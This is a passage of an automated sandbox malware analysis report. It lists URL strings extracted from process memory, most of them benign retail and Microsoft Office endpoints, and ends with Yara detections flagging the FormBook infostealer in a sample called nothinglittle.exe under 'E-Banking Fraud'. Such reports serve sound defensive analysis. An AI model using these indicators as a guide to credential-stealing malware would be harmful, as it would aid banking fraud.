Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.office.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://augloop.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.entity.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cr.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://directory.services.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.local
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://management.azure.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://management.azure.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://sectigo.com/CPS0U
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://secure.comodo.com/CPS0L
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://tasks.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/7
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=06
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
